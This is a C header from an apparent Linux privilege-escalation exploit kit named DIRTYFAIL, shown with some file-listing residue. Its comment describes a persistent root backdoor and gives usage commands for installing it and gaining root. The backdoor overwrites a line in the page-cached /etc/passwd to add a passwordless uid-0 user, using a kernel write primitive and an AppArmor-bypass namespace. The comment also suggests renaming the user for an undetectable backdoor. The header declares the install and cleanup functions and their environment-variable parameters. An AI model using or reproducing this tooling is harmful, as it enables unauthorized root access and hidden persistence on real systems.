60 lines
2.4 KiB
C
60 lines
2.4 KiB
C
/*
|
|
* DIRTYFAIL — backdoor.h
|
|
*
|
|
* Persistent uid-0 backdoor in the /etc/passwd page cache.
|
|
*
|
|
* MORE INVASIVE than the UID-flip exploits in copyfail.c /
|
|
* dirtyfrag_esp.c / dirtyfrag_rxrpc.c. Where those modify the calling
|
|
* user's UID for one shell session, this mode inserts a brand-new
|
|
* passwordless uid-0 user "dirtyfail" by length-matched overwrite of
|
|
* an existing nologin/false/sync line. The substituted line stays in
|
|
* the page cache until eviction, so:
|
|
*
|
|
* ./dirtyfail --exploit-backdoor # install + drop into root
|
|
* exit # back to your normal shell
|
|
* su - dirtyfail # any user, any time → root
|
|
*
|
|
* The username "dirtyfail" is intentionally chosen to match this
|
|
* project — anyone auditing /etc/passwd will spot it immediately,
|
|
* which is the opposite of stealth-by-default. If you need an
|
|
* undetectable backdoor for an authorized red-team engagement,
|
|
* change NEW_USER in backdoor.c.
|
|
*
|
|
* The on-disk /etc/passwd is unchanged. State (LINE_OFF, original
|
|
* VICTIM_LINE) is persisted at /var/tmp/.dirtyfail.state so that
|
|
* `--cleanup-backdoor` can restore the original line byte-by-byte
|
|
* via the same 1-byte primitive.
|
|
*
|
|
* This mode requires the GCM single-byte primitive (`cfg_1byte_write`)
|
|
* to land arbitrary bytes at arbitrary offsets — the 4-byte authencesn
|
|
* primitive can't easily rewrite a 50-byte line that doesn't align
|
|
* to 4-byte boundaries.
|
|
*
|
|
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
|
|
* (`run.sh`); reimplemented here as a single C function.
|
|
*/
|
|
|
|
#ifndef DIRTYFAIL_BACKDOOR_H
|
|
#define DIRTYFAIL_BACKDOOR_H
|
|
|
|
#include "common.h"
|
|
|
|
df_result_t backdoor_install(bool do_shell);
|
|
df_result_t backdoor_cleanup(void);
|
|
|
|
/* INNER variants — run inside the AA bypass userns. The inner reads
|
|
* the operation parameters from env vars set by the outer:
|
|
* DIRTYFAIL_INNER_MODE = backdoor-install | backdoor-cleanup
|
|
* DIRTYFAIL_LINE_OFF = byte offset of the victim line
|
|
* DIRTYFAIL_VICTIM_LINE = original /etc/passwd line bytes
|
|
* DIRTYFAIL_TARGET_LINE = (install only) replacement bytes
|
|
*/
|
|
df_result_t backdoor_install_inner(void);
|
|
df_result_t backdoor_cleanup_inner(void);
|
|
|
|
/* Used by --list-state. Returns true if a backdoor state file is present
|
|
* (and prints a summary), false if no file exists. Side-effect free. */
|
|
bool backdoor_list_state(void);
|
|
|
|
#endif
|